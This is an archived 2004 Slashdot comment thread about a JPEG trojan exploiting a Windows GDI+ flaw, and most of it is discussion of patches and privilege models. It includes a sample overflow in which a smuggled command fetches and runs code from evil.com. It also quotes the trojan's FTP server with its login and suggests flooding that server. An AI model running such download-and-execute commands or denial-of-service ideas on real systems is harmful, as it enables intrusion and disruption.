Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Security IT

First JPEG Virus Posted To Usenet 694

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."
This discussion has been archived. No new comments can be posted.

First JPEG Virus Posted To Usenet

Comments Filter:
  • by autopr0n ( 534291 ) on Monday September 27, 2004 @10:15PM (#10369085) Homepage Journal
    Congrats, microsoft, for making just about every filetype unsafe.

    The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.
    • Any recent version certainly does so.
    • by mini me ( 132455 ) on Monday September 27, 2004 @10:27PM (#10369197)
      Hopefully mozilla decodes the jpgs itself before rendering them on windows.

      It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.
    • by ConceptJunkie ( 24823 ) on Monday September 27, 2004 @10:28PM (#10369212) Homepage Journal
      This reminds me of my first thought when I saw Windows 95 message "It is now safe to turn off your computer."

      Which was, "However it is no longer safe to turn on your computer."

      Quality freefall.

      Really, how much new useful functionality has MS provided in the last 5 years? It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory. Functionality increases at best in a linear fashion, while system requirements increase at a geometric rate. Software eats more of your computer and offers less in return.

      Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

      Maybe they should shut down for a year. Take all the gigabyte-gobbling shit they've written for the last 10 years and turn it into useful code with no new functionality. Returning with the same stuff they have now, but with little or no security issues would win them more customers than their current monopolistic policies and FUD spreading ever will.

      Really, what else could they possibly do besides introduce a bunch of bloated new technologies for doing the same damn thing we all wrote for ourselves years ago, but without all the MS lock in and huge learning curve?

      I have to ask, what has MS done that is actually useful since Windows 2000?

      • by craXORjack ( 726120 ) on Monday September 27, 2004 @11:10PM (#10369503)
        It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory.

        I'm glad I'm not the only one who noticed this. btw cpu's are way faster than 10x faster. In 1994 I could only afford a 386sx at 16Mhz. Not only is the clock speed faster but the chip has gone through several major revisions. Yet I think that 386sx booted up faster and ran Lotus and Wordperfect under DOS just as fast as anything out there on Windows today. Of course there are some advantages to windows but speed sure isn't one of them!

        • by ConceptJunkie ( 24823 ) on Monday September 27, 2004 @11:47PM (#10369869) Homepage Journal
          The real kicker was when I switched to Outlook 2003 from Outlook Express. From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE. It was absurd. Oh, yeah, and the fact that an O2k3 data store can't be bigger than about 1GB to 1.5GB before it starts losing messages (I couldn't believe this at first but it was confirmed by two people with much more MS experience than me). I switched to Thunderbird around 0.5 and haven't given it a second thought.

          Now here's a case where the MS software really was well-designed and easy to use (from a UI standpoint), but the grotesque slowness of the app killed it for me.

          In 1994, I had a 50MHz 486SX... I didn't buy a Pentium 100 until '96, so you're right. Clock speed is more like 40 - 60 times faster (and thanks to wonders of CISC, performance is more than that). And disk space has increased for me by 3 orders of magnitude.

          I seem to recall MicroCenter or CompUSA having a "Buck-a-Meg" sale and I bought a 340MB drive for $340, bringing my total to a whopping 580MB. Now I've got about 600GB over about 4 machines, maybe more since each box is crammed full of old drives ranging from 7GB to 250GB etc in addition to a few bigger drives.

          I used to hate how my Amiga took like 3 minutes to boot back in the late 80's. Windows 2000 on a machine that was 100 times faster took around the same time. XP is much better, but still, there are times when I have a lot of apps loaded and it just seems to go out to lunch for several seconds before anything responds. And don't get me started on the launch time for Word 2003...

      • by Doyle ( 620849 ) on Tuesday September 28, 2004 @12:13AM (#10370104)
        I have to ask, what has MS done that is actually useful since Windows 2000?

        You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

        Oh, wait - that was the Romans :P
      • by HermanAB ( 661181 ) on Tuesday September 28, 2004 @12:30AM (#10370222)
        No dammit, if MS fix their code it will kill the PC support industry and another million wannabe geeks will be out of work...
      • by IchBinEinPenguin ( 589252 ) on Tuesday September 28, 2004 @01:33AM (#10370604)
        Returning with the same stuff they have now, but with little or no security issues

        Sorry, that won't work.

        Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

        Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

        Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)
      • by Tony-A ( 29931 ) on Tuesday September 28, 2004 @01:59AM (#10370742)
        "It is now safe to turn off your computer." ... Quality freefall.

        It's related.
        There is an arrogance that Microsoft knows best that is implicit in that statement. Whether or not it is actually safe to turn off the computer is very much outside of Microsoft's knowledge. In fact the safest thing to do when a system is acting bonkers is to hit reset or the power switch on old computers or pulling the power plug or removing the battery on new compouter where the power switch is no longer functional. The reasoning goes that when the system has its brains scrambled it desperately wants to write those scrambled brains to disk and thus perpetuate the scramble.

        Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurance of gaping new exploits increased significantly.

        One whole month, Well golly gee! Actually one month would be enough to stop hiding stuff and never under any circumstance use or require scripts or ActiveX controls for anything remotely related to security.
        [x] Hide files extension for known file types.
        That by itself is enough to wreck any attempts at achieving security. The message is loud and clear. Linux worms never seem to get anywhere. People see them and react violently to anything sneaking around trying to be invisible.

        Task Manager doesn't show everything. Microsoft Windows comes with a pre-installed root kit!

  • by TheSpoom ( 715771 ) * <slashdot@uberm0OPENBSD0.net minus bsd> on Monday September 27, 2004 @10:15PM (#10369093) Homepage Journal
    printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
    printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
    printf(" | September, 23, 2004 |\n");
    Geez, this guy really wants to be sued and/or arrested.
  • Can be prevented... (Score:5, Informative)

    by pbranes ( 565105 ) on Monday September 27, 2004 @10:15PM (#10369094)
    Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) [microsoft.com] and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.
    • by Zocalo ( 252965 ) on Monday September 27, 2004 @10:25PM (#10369183) Homepage
      Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner [sans.org] and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.
    • SUSE is also free, and will solve the problem....:P
      Sorry, couldn't resist that one.
    • by Saratoga C++ ( 456351 ) on Monday September 27, 2004 @10:53PM (#10369382) Journal
      Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

      Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

      So buyer beware.
    • Since this virus also affects MS Office, I bet it may be propogated that way.

      Most people update their system via windowsupdate.microsoft.com . However, despite the rumors, Windowsupdate does NOT update your MS Office suite.

      Very few people go the extrastep to use the MS office updater.
  • The real question... (Score:3, Interesting)

    by comwiz56 ( 447651 ) <comwiz&gmail,com> on Monday September 27, 2004 @10:17PM (#10369109) Homepage
    Does this affect Firefox?
  • Well... (Score:4, Funny)

    by Pantero Blanco ( 792776 ) on Monday September 27, 2004 @10:17PM (#10369113)
    It was only a matter of time. Now we wait for a dozen variants to pop up.

    "This could possibly be the worst viruses yet!"

    Hm...maybe when he started typing there was only one and it spread during the sentence?
  • by phantomAI ( 750299 ) on Monday September 27, 2004 @10:18PM (#10369122)
    I guess those nude pictures of Anna Kournikova could indeed be a virus.
  • Fantastic (Score:3, Insightful)

    by lukewarmfusion ( 726141 ) on Monday September 27, 2004 @10:19PM (#10369124) Homepage Journal
    Virus writers should be dragged out in the street and... well, whatever.

    The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.

    I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.
  • by bconway ( 63464 ) * on Monday September 27, 2004 @10:19PM (#10369128) Homepage
    If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.
    • by gl4ss ( 559668 ) on Monday September 27, 2004 @10:23PM (#10369165) Homepage Journal
      why it's a problem? because people do run with admin priviledges.

      I hate to break it to you but normal people don't know or care about things like that.
      .
    • by rufo ( 126104 ) <`rufo' `at' `rufosanchez.com'> on Monday September 27, 2004 @10:33PM (#10369248)
      Yeah, that's all well and good - except for the fact that Windows sets up users by default as administrators, as does every OEM to ship a Windows PC, and without any explanation as to why this is or why it might just be a bad idea.

      Until Microsoft stops shipping the OS wide-open for anyone to do anything they want, these kind of attacks will continue. Apple's gotten it much more right in this regard - even as a Mac user I don't think Mac OS X is particularly more secure then any other *nix or even Windows (just less analyzed), but at least Apple doesn't ship with any services turned on or allow admin users willy-nilly access over the entire system (most admin settings and files require password confirmation before continuing - not foolproof by any means but a huge step in the right direction), as do most good Unices these days.

      But of course not Windows. ;-)
    • by Etcetera ( 14711 ) * on Monday September 27, 2004 @10:49PM (#10369355) Homepage

      At the risk of being kicked off Slashdot for being a devil's advocate... ;)

      If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

      Why shouldn't I be able to run as an administrator on my own machine? It's my computer... I paid for it... I'm the only one using it. If the system is insecure, isn't that the system's fault? Am I to be blamed for operating my computer in a fashion that (*gasp*) allows me to make changes to it when I want without it bitching to me any further?

      Think bigger. Think to the future. "Don't log in as root/Don't be an administrator." is NOT an answer. Mac OS 9 and below operated by default in a single-user mode without *any* authentication necessary to make changes and I can list the successful viruses/exploits (especially remote exploits) by hand on a single sheet of paper.

      Artificial permission models (where "artificial" means "not needed by the environment") are not panaceas and aren't excuses for poor OS design.
      • interesting post, but: a lot of the reason to run a system with limited accounts is to prevent certain *users* doing things *you* don't want. not things that are 'definately wrong', like installing viruses, just things you don't want in your organisation. how is your better security modal/OS design ever going to prevent that? i guess on a single user system what you're saying could make good sense?
    • by Waffle Iron ( 339739 ) on Monday September 27, 2004 @11:21PM (#10369626)
      If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

      It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

    • by HuguesT ( 84078 ) on Tuesday September 28, 2004 @12:17AM (#10370134)
      All well and good but many things don't work in windows if you are not an administrator.

      I find it incredible that reputable developers like ID software for example require the latest demo of Doom 3 to be *installed* AND *run* as an administrator. The demo readme states this explicitely.

      Yes I do know about "Run As" but what are these people thinking? Administrator is for administrative tasks, not for playing games.

      No wonder XP is such a debacle area security wise.
      • by CheechBG ( 247105 ) * on Tuesday September 28, 2004 @11:19AM (#10373894) Homepage
        I don't know about you, but I don't want to have to use the Run As command every 15 minutes just to do something simple like burn a CD (need Admin privs) or run a game. This is my PC, I administrate it, so I run with Admin privledges. As such, it then becomes MY responsibility to make sure that bullshit stuff doesn't find it's way over. This is why I bother to run an AV program, have Spybot tell me whenever something is trying to write to the registry, and so on.

        At work, however, is a different story. I do have domain access, but I never log in as the domain admin unless I need to do some administration. I did, however, grant myself local admin rights on my machine for the same reasons above. I don't have a problem with spyware, adware, viruses, or anything.
    • by JoeBuck ( 7947 ) on Tuesday September 28, 2004 @12:24AM (#10370186) Homepage

      We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator. The reason is that the games were written in the Windows 95 era; they want to do direct access to everything, and that takes privileges that a non-admin Windows XP user does not have.

      This kind of thing is common, and it forces a lot of people to run with elevated privilege. This is the price of legacy. Of course, Microsoft could have provided some mechanism to run the older programs without privilege (say, with some kind of virtual machine setup), but they probably figured that if they didn't do the work, it would be easier to sell new XP versions of all the apps.

      • by jpop32 ( 596022 ) on Tuesday September 28, 2004 @06:47AM (#10371831)
        We generally run Linux in my house, but my six year old daughter has a couple of computer games, and one of our machines is dual-boot; pretty much all that that copy of Windows is used for is her games. Guess what? The games only work if I make my six year old an administrator.

        As a producer of children computer games, I have encountered those problems. Most are solved by a couple of registry/security policy edits. Try enabling 'Restrict CD-ROM Access to locally logged-on user only' in Local Security Policy (found in administrative tools). That should cure a lot of them.

        Careful assignment of permissions to ceratin files/directories would probably take care of others. Check out www.sysinternals.com for tools which can help you track down what the program is trying to open and what it fails to do.
  • by Indy1 ( 99447 ) on Monday September 27, 2004 @10:20PM (#10369134)
    clamscan possibleVirus.jpg
    possibleVirus.jpg: Exploit.JPEG.Comment FOUND

    ----------- SCAN SUMMARY -----------
    Known viruses: 24607
    Scanned directories: 0
    Scanned files: 1
    Infected files: 1
    Data scanned: 0.00 MB
    I/O buffer size: 131072 bytes
    Time: 0.501 sec (0 m 0 s)

    also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.
  • by Hardwyred ( 71704 ) on Monday September 27, 2004 @10:22PM (#10369149) Homepage
    your neighbors open accesspoint, a copy of Airpwn [evilscheme.org] and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.
  • by tajmorton ( 806296 ) on Monday September 27, 2004 @10:22PM (#10369155) Homepage
    No Screenshots, please!
  • by drachenfyre ( 550754 ) on Monday September 27, 2004 @10:24PM (#10369172) Homepage
    Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.
  • Eek! (Score:4, Funny)

    by StevenHenderson ( 806391 ) <stevehenderson@noSPaM.gmail.com> on Monday September 27, 2004 @10:25PM (#10369177)
    This could possibly be the worst viruses yet!

    These could be the worst grammar too!!!

  • by crazyray ( 776321 ) * on Monday September 27, 2004 @10:25PM (#10369178)
    If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.
    • Considering how many people are affected by malware loaded by visiting/loading code from a malicious (or hacked) website, I would expect this to spread relatively quickly once the exploit is propagated around all over the net.

      I saw one post indicating that the anti-virus tools can pick it up, but can they do so when you visit a website? My guess is no, and as such the majority of people who don't update their systems regularly (most people) have a pretty high likelihood of coming across such a site sooner
    • by djeca ( 670911 ) on Monday September 27, 2004 @11:30PM (#10369724)
      Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...
  • by gregoryl ( 187330 ) on Monday September 27, 2004 @10:27PM (#10369198)
    put the image on doubleclick.net
  • WAV files (Score:4, Interesting)

    by mosel-saar-ruwer ( 732341 ) on Monday September 27, 2004 @10:27PM (#10369199)
    Last weekend, I was messing around with writing my own WAV files [in conjunction with a LabVIEW project], and, oddly enough, M$FT's wmplayer.exe was the ONLY media player that checked the file for integrity.

    Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.

    I bet this sort of thing is a helluva lot more endemic than people realize.

  • DOS it now? (Score:3, Interesting)

    by real_smiff ( 611054 ) on Monday September 27, 2004 @10:28PM (#10369209)
    it connects to ftp://209.171.43.27/www/system/ u/p bawz/pagdba

    apparently, the text indicates, that's the only source for the installed files.

    if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).

  • by iamlucky13 ( 795185 ) on Monday September 27, 2004 @10:30PM (#10369222)

    Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.

    Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

    • I work for the University of Kentucky ResNet and when a student's computer appears to exhibit viral activity they will be blocked by their IP address by the Communications department. Then the student calls and we check if the IP is blocked or not. If they are, we send them to the anti-virus web page--the only web page the student can access from their computer. Once they install the virus software the university supplies, remove the virus(es), and upgrade to the latest service pack for their version of
  • Limited Accounts? (Score:4, Interesting)

    by WoTG ( 610710 ) on Monday September 27, 2004 @10:34PM (#10369256) Homepage Journal
    Anyone know if this exploit can be done when the user is using a Windows Limited account?

    • Re:Limited Accounts? (Score:4, Informative)

      by mtnharo ( 523610 ) <greengeek AT earthlink DOT net> on Monday September 27, 2004 @11:49PM (#10369883) Homepage
      From the sound of things, the exploit will be triggered, but this particular piece of code won't be able to do much, since it tries to install software that requires an Admin level account. Having a limited account won't prevent the user from running the exploit code, but it does prevent the exploit from leading to a system-level breach, unless some of privilege-escalation exploit is included as well.
  • Microsoft Patch (Score:5, Informative)

    by bcreane ( 667034 ) on Monday September 27, 2004 @10:40PM (#10369294) Homepage
    FYI, here's the fix from M$ for this exploit: Security Bulletin [microsoft.com]
  • NX Protection? (Score:5, Interesting)

    by rsmith-mac ( 639075 ) on Monday September 27, 2004 @11:02PM (#10369430)
    Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.
    • Re:NX Protection? (Score:5, Informative)

      by Anonymous Coward on Tuesday September 28, 2004 @12:02AM (#10370011)
      I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:
      char overflowed[10];
      char command="echo \"some silly command\"";

      int main(){
      strcpy(argv[1], overflowed);
      exec(command);
      }
      We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.
  • Sex! (Score:5, Funny)

    by InfiniteWisdom ( 530090 ) on Monday September 27, 2004 @11:03PM (#10369440) Homepage
    What, now you can't even WATCH sex without protection?
  • by bigberk ( 547360 ) <bigberk@users.pc9.org> on Monday September 27, 2004 @11:03PM (#10369446)
    In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.

    In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.

    Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?

    i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
  • by whoever57 ( 658626 ) on Monday September 27, 2004 @11:09PM (#10369492) Journal
    I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparanetly the system is vulnerable, but there is no way to fix it. Wonderful!
  • by base3 ( 539820 ) on Monday September 27, 2004 @11:09PM (#10369495)
    . . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .
  • by jaysones ( 138378 ) on Monday September 27, 2004 @11:15PM (#10369555)
    If there's no name yet, how about the Medusa virus?
  • by 8400_RPM ( 716968 ) on Monday September 27, 2004 @11:24PM (#10369658)
    So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

    Millions of instant zombies.

    Thats f*cking scarry....

  • by Anonymous Coward on Monday September 27, 2004 @11:25PM (#10369664)
    Claims Win 98SE is not affected! Great, all MS users can take a bold step back.

    TechNet Home Security Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) Issued: September 14, 2004 Updated: September 21, 2004 Version: 1.2 Summary Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components. Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical Recommendation: Customers should apply the update immediately. Security Update Replacement: None Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information. Tested Software and Security Update Download Locations:

    Affected Software:

    Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987) Microsoft Windows Server(TM) 2003 - Download the update (KB833987) Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987) Microsoft Office XP Service Pack 3 - Download the update (KB832332) Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332) Microsoft Office XP Software: Outlook® 2002 Word 2002 Excel 2002 PowerPoint® 2002 FrontPage® 2002 Publisher 2002 Access 2002 Microsoft Office 2003 Software: Outlook® 2003 Word 2003 Excel 2003 PowerPoint® 2003 FrontPage® 2003 Publisher 2003 Access 2003 InfoPath(TM) 2003 OneNote(TM) 2003 Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931) Microsoft Project 2003 (all versions) - Download the update (KB838344) Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932) Microsoft Visio 2003 (all versions) - Download the update (KB838345) Microsoft Visual Studio .NET 2002 - Download the update (KB830348) Microsoft Visual Studio .NET 2002 Software: Visual Basic .NET Standard 2002 Visual C# .NET Standard 2002 Visual C++ .NET Standard 2002 Microsoft Visual Studio .NET 2003 - Download the update (KB830348) Microsoft Visual Studio .NET 2003 Software: Visual Basic .NET Standard 2003 Visual C# .NET Standard 2003 Visual C++ .NET Standard 2003 Visual J# .NET Standard 2003 The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461) Microsoft Picture It!® 2002 (all versions) - Download the update Microsoft Greetings 2002 - Download the update Microsoft Picture It! version 7.0 (all versions) - Download the update Microsoft Digital Image Pro version 7.0 - Download the update Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update Microsoft Digital Image Pro version 9 - Download the update Microsoft Digital Image Suite version 9 - Download the update Microsoft Producer for Microsoft Office PowerPoint (all versions) Microsoft Platform SDK Redistributable: GDI+ - Download the update Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office

  • ANSI Bombs (Score:3, Interesting)

    by hpavc ( 129350 ) on Monday September 27, 2004 @11:51PM (#10369903)
    Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.

Where there's a will, there's a relative.

Working...